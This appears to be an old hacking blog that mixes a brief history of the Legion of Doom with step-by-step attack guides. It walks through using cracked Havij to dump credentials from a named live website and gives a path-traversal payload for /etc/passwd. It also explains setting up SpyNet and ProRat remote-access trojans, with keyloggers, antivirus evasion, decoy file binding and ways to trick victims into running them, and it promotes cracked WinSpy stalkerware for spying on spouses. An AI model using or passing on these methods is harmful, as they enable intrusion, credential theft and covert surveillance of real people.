Dedicated to:

This blog is dedicated to my mentors who taught me how Vulnerable cloud can be. And its also dedicated to symbianize as well. Thanks and more power to you.

Tuesday, July 10, 2012

The Legion Of Doom



What was this case about?



The Legion of Doom (LOD) was a hacker group active from the 1980s to the late 1990s and early 2000. Their name appears to be a reference to the antagonists of Challenge of the Superfriends. LOD was founded by the hacker Lex Luthor, after a rift with his previous group the Knights of Shadow.

At different points in the group's history, LOD was split into LOD and LOD/LOH (Legion of Doom/Legion of Hackers) for the members that were more skilled at hacking than pure phreaking. The overall beliefs of LOD and MOD were different, but it can be difficult to untangle the actions of the members since there was a cross-overs between the two groups.

Who were the parties involved?

As of 2012 what has happened to each individual member of the Legion of Doom is unknown. A small handful of the higher-profile LOD members who are accounted for includes: "Erik Bloodaxe", "Mark Tabas", "Karl Marx", "Agrajag the Prolonged", "Automatic Jack", "Bill From RNOC", "Lord Digital", "The Mentor", "Doctor Who", "Dead Lord", "Phiber Optik", who was a member of both LOD and Masters of Deception (MOD), and "Terminus".


Did any prosecution results? If so what where there outcomes?

"'Hacker' Pleads Guilty in AT&T CASE: Sentence Urged for Md. Man Among Stiffest Yet for Computer Crime"
By Mark Potts/Washington Post Staff Writer
BALTIMORE, March 22--A computer "hacker" "Legion of Doom" who was trying 
to help others steal electronic passwords guarding large corporate computer 
systems around the country today pleaded guilty to wire fraud in a continuing government crackdown on computer crime. Federal prosecutors recommended that Leonard Rose Jr., 32, of Middletown, Md., be sent to prison for one year and one day, which would be one of the stiffest sentences imposed to date for computer crime. Sentencing is scheduled for May before U.S. District Judge J. Frederick Motz.

What Ethical Issues are raised by this case?

One way that people can interpret actions for unethical behavior is considering the legality. In United States for an instance which has Credit Fraud and Abuse Act prohibits intentionally accessing another`s computer system when it threatens the financial well-being of an individual or business to reveal state secrets, upset international communications, defraud, cause damage or aid extortion. States have their own laws as well.
Other points considered in discussions of ethical hacking include the costs associated with security checks even when no alterations or damages have occurred. Many consider the high amount of adolescent participants and factor this into ethical judgments, believing the anonymity associated with hacking makes crimes more likely to happen than they would outside of cyberspace 



Monday, December 5, 2011

Hacking Software: HAVIJ SQL injection tool: [FULL VERSION] [CRACK]

You can try the tutorial here: Click here



Description:

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.

The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.

The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.




What's New?

* Oracle error based database added with ability to execute query.
* Getting tables and column when database name is unknown added (mysql)
* Another method added for finding columns count and string column in PostgreSQL
* Automatic keyword finder optimized and some bugs fixed.
* A bug in finding valid string column in mysql fixed.
* 'Key is not unique' bug fixed
* Getting data starts from row 2 when All in One fails - bug fixed
* Run time error when finding keyword fixed.
* False table finding in access fixed.
* keyword correction method made better
* A bug in getting current data base in mssql fixed.
* A secondary method added when input value doesn't return a normal page (usually 404 not found)
* Data extraction bug in html-encoded pages fixed.
* String or integer type detection made better.
* A bug in https injection fixed.


Download:

http://hotfile.com/dl/97920650/15804c2/DL4soft.com_havij1.13pro.zip.html

HAVIJ software tutorial for Sql injection.

Download havij 1.10


First Find a sqli infected site .Now here i found a vulernable site
http://www.hypetrading.com/productinfo.php?id=285


Now Let's start


Open havij and copy and paste infected link as shown in figure

 

Now click in the "Analyze"
 

Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx



Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed



After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in
 figur
 

In that Just put mark username and password and click "Get data"




Bingo Got now id and pass that may be admin...
The pass will get as md5 you can crack it also using this tool as shown in figure...


6 ways to hack or deface websites online

Hello friends , today i will explain all the methods that are being used to hack a website or websites database. This is the first part of the hacking websites tutorial where i will explain in brief all methods for hacking or defacing websites. Today I will give you the overview and in later tutorials we will discuss them one by one with practical examples. So guys get ready for first part of Hacking websites class.... Don't worry i will also tell you how to protect your websites from these attacks and other methods like hardening of SQL and hardening of web servers and key knowledge about CHMOD rights that what thing should be give what rights...


Note : This post is only for Educational Purpose only.





What are basic things you should know before website hacking?
First of all everything is optional as i will start from very scratch. But you need atleast basic knowledge of following things..


1. Basics of HTML, SQL, PHP.
2. Basic knowledge of Javascript.
3. Basic knowledge of servers that how servers work.
4. And most important expertize in removing traces otherwise u have to suffer consequences.

Now First two things you can learn from a very famous website for basics of Website design with basics of HTML,SQL,PHP and javascript.
http://www.w3schools.com/


And for the fourth point that you should be expert in removing traces. I will explain this in my future articles. So keep reading.. or simply subscribe my posts..

As we know traces are very important. Please don't ignore them otherwise you can be in big trouble for simply doing nothing. so please take care of this step.


METHODS OF HACKING WEBSITE:
1. SQL INJECTION
2. CROSS SITE SCRIPTING
3. REMOTE FILE INCLUSION
4. LOCAL FILE INCLUSION
5. DDOS ATTACK
6. EXPLOITING VULNERABILITY.


1. SQL INJECTIONFirst of all what is SQL injection? SQL injection is a type of security exploit or loophole in which a attacker "injects" SQL code through a web form or manipulate the URL's based on SQL parameters. It exploits webapplications that use client supplied SQL queries.
The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command, the malicious code is executed.

2. CROSS SITE SCRIPTINGCross site scripting (XSS) occurs when a user inputs malicious data into a website, which causes theapplication to do something it wasn’t intended to do. XSS attacks are very popular and some of the biggest websites have been affected by them including the FBI, CNN, Ebay, Apple, Microsft, and AOL.Some website features commonly vulnerable to XSS attacks are:
• Search Engines
• Login Forms
• Comment Fields

Cross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.

I will explain this in detail in later hacking classes. So keep reading..


3. REMOTE FILE INCLUSION
Remote file inclusion is the most often found vulnerability on the website.
Remote File Inclusion (RFI) occurs when a remote file, usually a shell (a graphical interface for browsing remote files and running your own code on a server), is included into a website which allows the hacker to execute server side commands as the current logged on user, and have access to files on the server. With this power the hacker can continue on to use local
exploits to escalate his privileges and take over the whole system.
RFI can lead to following serious things on website :


Code execution on the web server
Code execution on the client-side such as Javascript which can lead to other attacks such as cross site scripting (XSS).
Denial of Service (DoS)
Data Theft/Manipulation

4. LOCAL FILE INCLUSION
Local File Inclusion (LFI) is when you have the ability to browse through the server by means of directory transversal. One of the most common uses of LFI is to discover the /etc/passwd file. This file contains the user information of a Linux system. Hackers find sites vulnerable to LFI the same way I discussed for RFI’s.
Let’s say a hacker found a vulnerable site, www.target-site.com/index.php?p=about, by means of directory transversal he would try to browse to the /etc/passwd file:
www.target-site.com/index.php?p= ../../../../../../../etc/passwd

I will explain it in detail with practical websites example in latter sequential classes on Website Hacking.


5. DDOS ATTACKSimply called distributed denial of service attack. A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an Internet site or service from functioning efficiently or at all, temporarily or indefinitely. In DDOS attack we consumes the bandwidth and resources of any website and make it unavailable to its legitimate users.

6.EXPLOTING VULNERABILITYIts not a new category it comprises of above five categories but i mentioned it separately because there are several exploits which cannot be covered in the above five categories. So i will explain them individually with examples. The basic idea behind this is that find the vulnerability in the website and exploit it to get the admin or moderator privileges so that you can manipulate the things easily.

I hope you all now have a overview of that what is Website Hacking. In consecutive future classes i will explain all of these techniques in details. So guys keep reading..

Hosting your own Rat. using SPY-NET [RAT].

In this tutorial I will show you how to setup SpynetRAT and how to use it.
SpynetRAT is one of the most easiest RAT's to use, how ever it is not FUD and does need to be crypted.

Q, What is a RAT ?
A, A RAT is Remote Access Trojan. It allows you to do many thing's to the victim or infected person.


But be careful do not start your own rat on you computer, thats a normal mistake.

First you need to download these two files:No-ip DUC and Spy-Net RAT
http://www.multiupload.com/R1SJ8PKX36

Then we need to setup Our No-ip account1. Go to www.no-ip.com


2. Create a new account
3. Confirm it from your E-Mail
4. Login To No-IP website
5. Select Add a host
6. Click Create Host
7. Write what you want the name of your No-IP adress to be








8. Click Create Host
9. Download No-IP DUC , Install it , then login with your Email and password.
10. Once you do You will see your server there. Click on the icon and it will be smiling (:D)

Port forwardingI Will not explain that much
1. Go to http://www.portforward.com
2. Click CTRL+F
3. Select Your Route
4. Follow the guide and do this with the port 81
.

Setup Spy-Net!


1. Go to File -> Create Server -> Select any of the profiles




2. Connection






Where it says “Your_Dns_here” Click once on it and click DELETE. Then click ADD and write your No-ip adress , and click Add or OK i dont know what it was






3. Installation





Leave everything as it is… ( these the options i use personally)




4. KeyLogger






And i prefer using the Backspace option too , as if someone logins to facebook , and his email is saerdna798@hotmail.com , and he misspelled something and it showed as saerdna879@hotmail.com , im sure he will use backspace and fix it , so this will be recorded on your keylogger and you can get the passwords easier.






5. Anti-Debug





Okay select all of them , if you want to test it on sandboxie , unselect the first oneb






6. Final Step







Chose anything you want , for changing the icon click on the Picture icon on there and select any .exe or .ico files…





.

F.A.Q


Content


Q. Why when i try to access Spy-Net.exe is says cannot access the specified device path or file?
A. This means you have an antivirus that deletes the virus instantly after you download it , antiviruses such as AVG do it , you need to UNINSTALL AVG to make it work. __
Q. How do i make my file undedectable by antiviruses ? [FUD]
A. Use a crypter.

Windows Spy Pro V9.0.175 crack version





Do you need to know what your child is doing on the computer?
Is your spouse cheating on you?
Do you need to monitor what your employees are doing during work hours?
Is someone tampering with your computer while you are away?
With Win Spy Software you will know exactly what they are doing.
WinSpy is a Complete Stealth Monitoring Software that can both monitor your Local PC and Remote PC.
WinSpy Software also includes Remote Install.
WinSpy Software will capture anything the user sees or types on the keyboard. Users will be unaware of its existence.
A special hotkey is used to login and access Win Spy Software.
Users are unable to terminate WinSpy.
Users are unable to uninstall WinSpy.


PRODUCT FEATURES:• Stealth Monitoring
• Key Recorder
• Screen Capture
• KeyWord Alerter
• Folder Hider
• Monitor Networks
• Clear Tracks Utility
• WebCam via Internet
• Lost PC Tracking
• Secure File Deletion
• Time on Net Report
• Websites Visited Reports
• Immune to Anti-Spyware
• NEW – Remote Install
• NEW – Remote Screen Capture
• NEW – Remote Keylogger
• NEW – Remote PC Browser
• NEW – Notify’s User Online
• NEW – Remote Sound Lis/Rec
• NEW – Remote Cam View/Rec
• NEW – Remote file launch
• NEW – DualSide Chat Recording
• NEW – Remote PC Shutdown
• NEW – Remote PC FTP
• NEW – WebCam-Motion Detect
• NEW – WebAccess Remote PC


- Monitor Chat Room (dual side) and Web Activity
- Monitor any Email
- Monitor Children’s activities on Computer / Web
- Monitor Employees or counter monitor employers
- Monitor a cheating spouse
- Records any password
- Monitors across networks
- Monitor by user
- Monitor via Webcam (record/view)
- Monitor via Mic (record/view)
- Monitor multiple remote PC
- Remote Deployment and Monitoring
- Remote FTP (upload/download) any file to remote PC
- Password Protected and special Hot Key for program
- Monitor in Total Stealth
- Monitor Remote PC Webcam

OS: Win98/ME/NT40/2000/XP/ Vista 32

Homepage:

Code:
http://www.win-spy.com

Download:

Code:
http://rapidshare.com/files/102368698/Win-Spy.rar

Sunday, December 4, 2011

Hack Accounts, Emails, Passwords, using ProRat hacking software.

Now you know that there are many ways to hack email password, like bruteforcing, social engineering or Reverting, but the main two methods used to hack email passwords are Remote Keylogging and Phishing. In this article i'll show you how to hack email account password using keyloggers and trojans. Here I am demonstrating using PRORAT trojan. You can use any trojan or keylogger as per your ease. The basic functionality of all backdoors are same. Pls make note that all these hacking tools and softwares are detected by antivirus. You have to uninstall or close you running antivirus first. Now we can start.

How to Hack Email Account Passwords Using ProRat?

1. First of all Download ProRat. Once it is downloaded right click on the folder and choose to extract it. A password prompt will come up. The password will be "pro".

2. Open up the program. You should see the following:


3. Next we will create the ProRat Trojan server. Click on the "Create" button in the bottom. Choose "Create ProRat Server".


4. Next put in your IP address so the server could connect to you. If you don’t know your IP address click on the little arrow to have it filled in for you automatically. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options.


5. Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.

Here is a quick overview of what they mean and which should be checked:


6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. A good suggestion is a picture or an ordinary text document because that is a small file and its easier to send to the people you need.


7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I prefer using .exe files, because it is cryptable and has icon support, but exe’s looks suspicious so it would be smart to change it.


8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document.



9. After this, press Create server, your server will be in the same folder as ProRat. A new file with name "binded_server" will be created. Rename this file to something describing the picture. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it.

Very important: Do not open the "binded_server" file on your system.

10. You can send this trojan server via email, pendrive or if you have physical access to the system, go and run the file. You can not send this file via email as "server.exe", because it will be detected as trojan or virus. Password protect this file with ZIP and then email it. Once your victim download this ZIP file, ask him to unlock it using ZIP password. When the victim will double click on the file, he will be in your control.

11. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next.

Once the victim runs the server on his computer, the trojan will be installed onto his computer in the background. The hacker would then get a message telling him that the victim was infected. He would then connect to his computer by typing in his IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to the victims computer and have full control over it.



12. Now the hacker has a lot of options to choose from as you can see on the right. He has access to all victim's computer files, he can shut down his pc, get all the saved passwords off his computer, send a message to his computer, format his whole hard drive, take a screen shot of his computer, and so much more. Below I’ll show you a few examples.



13. The image below shows the message that the victim would get on his screen if the hacker chose to message him.



14. Below is an image of the victims task bar after the hacker clicks on Hide Start Button.



15. Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen.



As you saw in the above example, a hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan so if the victim has an anti-virus program installed he most likely won’t get infected. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti-virus programs.